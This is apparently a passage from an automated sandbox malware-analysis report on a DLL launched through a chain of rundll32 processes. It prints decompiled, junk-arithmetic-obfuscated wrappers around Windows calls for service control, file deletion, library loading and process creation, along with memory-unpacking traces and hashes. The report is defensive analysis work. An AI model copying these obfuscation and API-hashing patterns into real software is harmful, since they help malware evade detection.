                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: FileHandleInformation
                        • String ID: WW$
                        • API String ID: 3935143524-2337609217
                        • Opcode ID: a6d088da77b8aced721c97028085f12f08c442a5c09021e5257d4aedb99ae776
                        • Instruction ID: 4c4ec864ed390e831fb990092291f9e2031f1e4e25354542dc6982a514d182d1
                        • Opcode Fuzzy Hash: a6d088da77b8aced721c97028085f12f08c442a5c09021e5257d4aedb99ae776
                        • Instruction Fuzzy Hash: 12018B35A41608FBEB05DF98DC06ECEBFB6EB48700F508094FA046A291C7B25B54DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1000732D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E1000732D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t35;
				void* _t42;
				signed int _t44;
				void* _t49;

				_push(_a20);
				_t49 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E1001DA49(_t35);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v24 = 0x528569;
				_v8 = 0x6031;
				_v8 = _v8 + 0x1dc1;
				_v8 = _v8 << 0xf;
				_v8 = _v8 + 0x98b0;
				_v8 = _v8 ^ 0x3ef9c1b6;
				_v12 = 0x2915;
				_t44 = 0x21;
				_v12 = _v12 / _t44;
				_v12 = _v12 | 0x6f33eb00;
				_v12 = _v12 ^ 0x6f33d113;
				E10005C61(0xf0536f07, 0x107, 0xbc6fde34);
				_t42 = RtlAllocateHeap(_t49, _a12, _a20); // executed
				return _t42;
			}












                        0x10007334
                        0x10007337
                        0x10007339
                        0x1000733c
                        0x1000733f
                        0x10007342
                        0x10007346
                        0x10007347
                        0x1000734c
                        0x10007352
                        0x10007356
                        0x1000735d
                        0x10007364
                        0x1000736b
                        0x1000736f
                        0x10007376
                        0x1000737d
                        0x10007389
                        0x10007394
                        0x10007397
                        0x1000739e
                        0x100073b5
                        0x100073c4
                        0x100073ca

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 100073C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 1`
                        • API String ID: 1279760036-3392566293
                        • Opcode ID: b7eb600688c6565edcf02888dd794f768ca7954795d797b8652bd397d62a2808
                        • Instruction ID: 39a193317f939250f5b44f46ec56d24ec03b42defc4e66ad5420ff7882869806
                        • Opcode Fuzzy Hash: b7eb600688c6565edcf02888dd794f768ca7954795d797b8652bd397d62a2808
                        • Instruction Fuzzy Hash: 4B112776D01218FBEF05DFD0C90AADEBFB1EF54315F148089F90066250D7B59B649B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1000CDA9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule
                        C-Code - Quality: 73%
                        			E1000CDA9(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t28;
				void* _t36;
				signed int _t38;

				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E1001DA49(_t28);
				_v12 = 0x649c;
				_t38 = 0x5c;
				_v12 = _v12 * 0x5c;
				_v12 = _v12 + 0xcd74;
				_v12 = _v12 + 0xffffbcd9;
				_v12 = _v12 ^ 0x0024844b;
				_v8 = 0x5c63;
				_v8 = _v8 + 0xfa66;
				_v8 = _v8 >> 1;
				_v8 = _v8 / _t38;
				_v8 = _v8 ^ 0x00000d7f;
				E10005C61(0x6619734a, 0x17b, 0x131a05a);
				_t36 = OpenSCManagerW(0, 0, _a4); // executed
				return _t36;
			}








                        0x1000cdaf
                        0x1000cdb4
                        0x1000cdb5
                        0x1000cdb9
                        0x1000cdba
                        0x1000cdbf
                        0x1000cdce
                        0x1000cdd2
                        0x1000cdd5
                        0x1000cddc
                        0x1000cde3
                        0x1000cdea
                        0x1000cdf1
                        0x1000cdf8
                        0x1000ce05
                        0x1000ce0d
                        0x1000ce1f
                        0x1000ce2c
                        0x1000ce32

                        APIs
                        • OpenSCManagerW.SECHOST(00000000,00000000,0024844B), ref: 1000CE2C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: ManagerOpen
                        • String ID: c\
                        • API String ID: 1889721586-1842624324
                        • Opcode ID: 35937591655afac161ba036a707d809e48f6271fa47a247ad5e8474496e437c8
                        • Instruction ID: f4466ecdcc53f92f7fafc489d9fa87da10cfd842f9edec95dacaaec5af657488
                        • Opcode Fuzzy Hash: 35937591655afac161ba036a707d809e48f6271fa47a247ad5e8474496e437c8
                        • Instruction Fuzzy Hash: E2012575901608FFEB14DFD1C88A8DFBFB8EF45715F10818AE8086A290E7B55B509B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001B7A7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37serviceCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E1001B7A7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				void* _t27;
				int _t34;
				signed int _t36;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E1001DA49(_t27);
				_v12 = 0xffce;
				_v12 = _v12 ^ 0x1c965c06;
				_v12 = _v12 << 2;
				_t36 = 0x13;
				_v12 = _v12 / _t36;
				_v12 = _v12 ^ 0x0604f35e;
				_v8 = 0x9c6;
				_v8 = _v8 | 0xef7fd198;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000af1f;
				E10005C61(0x492cea6b, 0x15, 0x131a05a);
				_t34 = CloseServiceHandle(_a12); // executed
				return _t34;
			}








                        0x1001b7ac
                        0x1001b7af
                        0x1001b7b2
                        0x1001b7b7
                        0x1001b7bc
                        0x1001b7c5
                        0x1001b7cc
                        0x1001b7d5
                        0x1001b7e0
                        0x1001b7e3
                        0x1001b7ea
                        0x1001b7f1
                        0x1001b7f8
                        0x1001b7fc
                        0x1001b810
                        0x1001b81b
                        0x1001b820

                        APIs
                        • CloseServiceHandle.SECHOST(?,?,?,?,?,?), ref: 1001B81B
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: CloseHandleService
                        • String ID: k,I
                        • API String ID: 1725840886-3352538913
                        • Opcode ID: b3eeda5c4ed2def4c2d269b5d0408d79bcde07b388a5e64ecef65320e8912d16
                        • Instruction ID: 4f5ec6c8ea8c8f9ae292986bb35cec93ba23287643d5a6f1b66afedcd7fc82e2
                        • Opcode Fuzzy Hash: b3eeda5c4ed2def4c2d269b5d0408d79bcde07b388a5e64ecef65320e8912d16
                        • Instruction Fuzzy Hash: 770128B290020CFBEF14DFD0C84689EBB75EB40300F10809DE5156B251D6B25B909B41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 100072C1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E100072C1(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t18;
				int _t23;
				WCHAR* _t28;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_t28 = __ecx;
				_push(__ecx);
				E1001DA49(_t18);
				_v12 = 0xef64;
				_v12 = _v12 | 0x5cc273e3;
				_v12 = _v12 ^ 0x5cc2ac13;
				_v8 = 0xfcc8;
				_v8 = _v8 | 0x55374e86;
				_v8 = _v8 << 2;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0xff675578;
				E10005C61(0x111a107e, 0x23a, 0xbc6fde34);
				_t23 = DeleteFileW(_t28); // executed
				return _t23;
			}








                        0x100072c4
                        0x100072c5
                        0x100072c7
                        0x100072ca
                        0x100072cd
                        0x100072ce
                        0x100072d3
                        0x100072dd
                        0x100072e9
                        0x100072f0
                        0x100072f7
                        0x100072fe
                        0x10007302
                        0x10007306
                        0x1000731d
                        0x10007326
                        0x1000732c

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: DeleteFile
                        • String ID: d
                        • API String ID: 4033686569-3778237843
                        • Opcode ID: 1266adab9469013f0afd2fbea3249ae616330f45d304632c74abfdd5ac787f32
                        • Instruction ID: 2aed4cb1dece676f15600213f3e02a13e566a16051c5f6cd73f79e2b7702838a
                        • Opcode Fuzzy Hash: 1266adab9469013f0afd2fbea3249ae616330f45d304632c74abfdd5ac787f32
                        • Instruction Fuzzy Hash: ABF09A35D02208FBEB14DBD0C98A8EEBF78EF01A84F108098E85463210DBB16F40DBD2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10014920, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32libraryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 89%
                        			E10014920(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				struct HINSTANCE__* _t26;
				signed int _t28;

				_push(_a4);
				E1001DA49(_t19);
				_v12 = 0x4e6c;
				_v12 = _v12 + 0xffff9b57;
				_v12 = _v12 ^ 0xffffa248;
				_v8 = 0x624;
				_t28 = 0xd;
				_v8 = _v8 / _t28;
				_v8 = _v8 ^ 0x00007316;
				E10005C61(0x8b11820c, 0x143, 0xbc6fde34);
				_t26 = LoadLibraryW(_a4); // executed
				return _t26;
			}








                        0x10014925
                        0x1001492a
                        0x1001492f
                        0x10014938
                        0x1001493f
                        0x10014946
                        0x10014952
                        0x1001495d
                        0x10014960
                        0x10014977
                        0x10014982
                        0x10014987

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: lN
                        • API String ID: 1029625771-435509955
                        • Opcode ID: 87ab02a34ce4affac45c81db5b2fc537abfcab62053b9ddbcf1696dfedde1bec
                        • Instruction ID: e6f8fcc8720cb2d2c592f766cdf3da7c201aafb9a131478738a4e9a884b7e6c3
                        • Opcode Fuzzy Hash: 87ab02a34ce4affac45c81db5b2fc537abfcab62053b9ddbcf1696dfedde1bec
                        • Instruction Fuzzy Hash: 04F03AB1A00308FBEB14DFE4DC4699EBFB5EB90300F508199F9086B2A1D7B66F519B50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10002B17, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E10002B17(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t16;
				int _t21;
				struct _SHFILEOPSTRUCTW* _t26;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_t26 = __ecx;
				_push(__ecx);
				E1001DA49(_t16);
				_v8 = 0xb9b;
				_v8 = _v8 | 0xf56bfeff;
				_v8 = _v8 + 0x5675;
				_v8 = _v8 ^ 0xf56c7979;
				_v12 = 0xa869;
				_v12 = _v12 + 0xb1c4;
				_v12 = _v12 ^ 0x00011777;
				E10005C61(0x49896e0f, 0x30, 0xfe955d23);
				_t21 = SHFileOperationW(_t26); // executed
				return _t21;
			}








                        0x10002b1a
                        0x10002b1b
                        0x10002b1d
                        0x10002b20
                        0x10002b23
                        0x10002b24
                        0x10002b29
                        0x10002b33
                        0x10002b3f
                        0x10002b46
                        0x10002b4d
                        0x10002b54
                        0x10002b5b
                        0x10002b6f
                        0x10002b78
                        0x10002b7e

                        APIs
                        • SHFileOperationW.SHELL32(?), ref: 10002B78
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: FileOperation
                        • String ID: uV
                        • API String ID: 3080627654-2442750861
                        • Opcode ID: de87c050a12aa41101e9ab9a7ebfbba5498e1d511ffb424979493e2267c05868
                        • Instruction ID: 2476c49a443dae8b8675b38e0c3a8be59998b16f2401ae187b9d4a8723b18ade
                        • Opcode Fuzzy Hash: de87c050a12aa41101e9ab9a7ebfbba5498e1d511ffb424979493e2267c05868
                        • Instruction Fuzzy Hash: 9CF09A72805308FBEB04DBC0D84A8DEBFB8EF01319F208088E8006B290E7B51F44CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10003817, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E10003817() {
				signed int _v8;
				signed int _v12;

				_v8 = 0xed11;
				_v8 = _v8 + 0xaef;
				_v8 = _v8 ^ 0x8d025d08;
				_v8 = _v8 + 0xffff2d16;
				_v8 = _v8 ^ 0x8d01a6db;
				_v12 = 0x5cac;
				_v12 = _v12 + 0xffff7e76;
				_v12 = _v12 ^ 0x27663cef;
				_v12 = _v12 ^ 0xd899f136;
				E10005C61(0xe650d89f, 0x24d, 0xbc6fde34);
				ExitProcess(0);
			}





                        0x1000381c
                        0x10003823
                        0x1000382a
                        0x10003831
                        0x10003838
                        0x1000383f
                        0x10003846
                        0x1000384d
                        0x10003854
                        0x10003871
                        0x1000387b

                        APIs
                        • ExitProcess.KERNEL32(00000000), ref: 1000387B
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: ExitProcess
                        • String ID: <f'
                        • API String ID: 621844428-2424530120
                        • Opcode ID: 849826251e048e8e7f939794528d88b1198198bb39ce93ae1e784e12499691a6
                        • Instruction ID: 3499bbe4aa7a9740393d2c96346581557e29f089fbb929dfbd69fa3ac15089a2
                        • Opcode Fuzzy Hash: 849826251e048e8e7f939794528d88b1198198bb39ce93ae1e784e12499691a6
                        • Instruction Fuzzy Hash: 9CF03AB1D06348FFFB98CBE4D94A98EBA74EB10314F204188A055A2190E3711F159A51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0019DF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2088409630.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10012CFF, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38COMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E10012CFF(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t21;
				int _t28;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E1001DA49(_t21);
				_v28 = 0x5cafc8;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0x449c;
				_v8 = _v8 * 0x1e;
				_v8 = _v8 | 0x77ac1fee;
				_v8 = _v8 ^ 0x77ac4cfc;
				_v12 = 0x4c9d;
				_v12 = _v12 + 0x7e3d;
				_v12 = _v12 ^ 0x0000c98d;
				E10005C61(0x4f7d7a0e, 0x1d0, 0xbc6fde34);
				_t28 = CloseHandle(_a8); // executed
				return _t28;
			}









                        0x10012d06
                        0x10012d09
                        0x10012d0c
                        0x10012d11
                        0x10012d16
                        0x10012d25
                        0x10012d30
                        0x10012d36
                        0x10012d37
                        0x10012d42
                        0x10012d45
                        0x10012d4c
                        0x10012d53
                        0x10012d5a
                        0x10012d61
                        0x10012d6e
                        0x10012d79
                        0x10012d7f

                        APIs
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,1000F4B8,00000000), ref: 10012D79
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: CloseHandle
                        • String ID: =~
                        • API String ID: 2962429428-2626422394
                        • Opcode ID: aab4d7573046a8be43c0b8137778bd9a6f0b0122852b87bd8b94487162b56cde
                        • Instruction ID: e43292a9dbc710b8564e87f1f34b31a6cc5d5816445325222bc2b5a62454ae41
                        • Opcode Fuzzy Hash: aab4d7573046a8be43c0b8137778bd9a6f0b0122852b87bd8b94487162b56cde
                        • Instruction Fuzzy Hash: A4014B7190120CFBEB00DFE9C94699EFFB5EF84304F608489E9146B161D7769B149B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001294D, Relevance: 1.6, APIs: 1, Instructions: 69processCOMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E1001294D(long __edx, int _a4, struct _PROCESS_INFORMATION* _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, WCHAR* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				intOrPtr _v20;
				void* _t44;
				int _t53;
				signed int _t54;
				signed int _t55;
				long _t63;

				_t63 = __edx;
				_push(0);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E1001DA49(_t44);
				_v20 = 0x3239af;
				_v16 = 0;
				_v12 = 0xfa8d;
				_t54 = 0x16;
				_v12 = _v12 / _t54;
				_v12 = _v12 | 0x8b0a6119;
				_v12 = _v12 ^ 0x8b0a4594;
				_v8 = 0xcf07;
				_t55 = 0x19;
				_v8 = _v8 / _t55;
				_v8 = _v8 ^ 0x754979be;
				_v8 = _v8 ^ 0x754925fb;
				E10005C61(0xd2cfc7ea, 0xd3, 0xbc6fde34);
				_t53 = CreateProcessW(_a56, _a32, 0, 0, _a4, _t63, 0, 0, _a20, _a8); // executed
				return _t53;
			}












                        0x10012957
                        0x10012959
                        0x1001295a
                        0x1001295d
                        0x10012960
                        0x10012961
                        0x10012964
                        0x10012967
                        0x1001296a
                        0x1001296d
                        0x1001296e
                        0x10012971
                        0x10012974
                        0x10012977
                        0x1001297a
                        0x1001297d
                        0x10012980
                        0x10012981
                        0x10012982
                        0x10012987
                        0x10012990
                        0x10012993
                        0x1001299f
                        0x100129a4
                        0x100129a9
                        0x100129b0
                        0x100129b7
                        0x100129c1
                        0x100129cc
                        0x100129cf
                        0x100129d6
                        0x100129ed
                        0x10012a09
                        0x10012a10

                        APIs
                        • CreateProcessW.KERNEL32(?,?,00000000,00000000,8B0A4594,00003A8F,00000000,00000000,00007501,?), ref: 10012A09
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 8c0651e5094ca53d30d44ba9d0758c6851cf9b1efa12cb51092056da4baa4289
                        • Instruction ID: 759f5ece550ec218662e272feee5b5b7f0cb765e03c1e6c30aec8430279ccf3c
                        • Opcode Fuzzy Hash: 8c0651e5094ca53d30d44ba9d0758c6851cf9b1efa12cb51092056da4baa4289
                        • Instruction Fuzzy Hash: 5821EF36900148FBDF159FE6DC06CDEBF76EB89750F108089FA1866160C3729A61EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 10003D55, Relevance: .0, Instructions: 2COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E10003D55() {

				return  *[fs:0x30];
			}



                        0x10003d5b

                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Analysis Process: rundll32.exe PID: 2732 Parent PID: 2760 rundll32.exeCOMMON

                        Executed Functions

                        Function 0019E530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 00000008.00000002.2090733634.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0019DF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2090733634.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: rundll32.exe PID: 1980 Parent PID: 2732 rundll32.exeCOMMON

                        Executed Functions

                        Function 0019E530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 00000009.00000002.2092427375.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0019DF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2092427375.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: rundll32.exe PID: 2724 Parent PID: 1980 rundll32.exeCOMMON

                        Executed Functions

                        Function 0015E530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0015E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0015E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0015E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0015E770
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2095310547.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: fb304f36336920efae47d2530f91eb561b19b25896ede78ed6290884c2e3411c
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: F4B198B4E00109DFCB48CF94C591EAEB7B5BF88305F208159E919AB355D735EE86CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0015DF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0015DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2095310547.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: 880592214337a7eec63fb713113ba210884b7e026eb7b2ea8e56b076bd43fb29
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: E9116060C08289DEEF01DBE894097EEBFB45B21705F044098DA442B282D3BA17588BB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: rundll32.exe PID: 2500 Parent PID: 2724 rundll32.exeCOMMON

                        Executed Functions

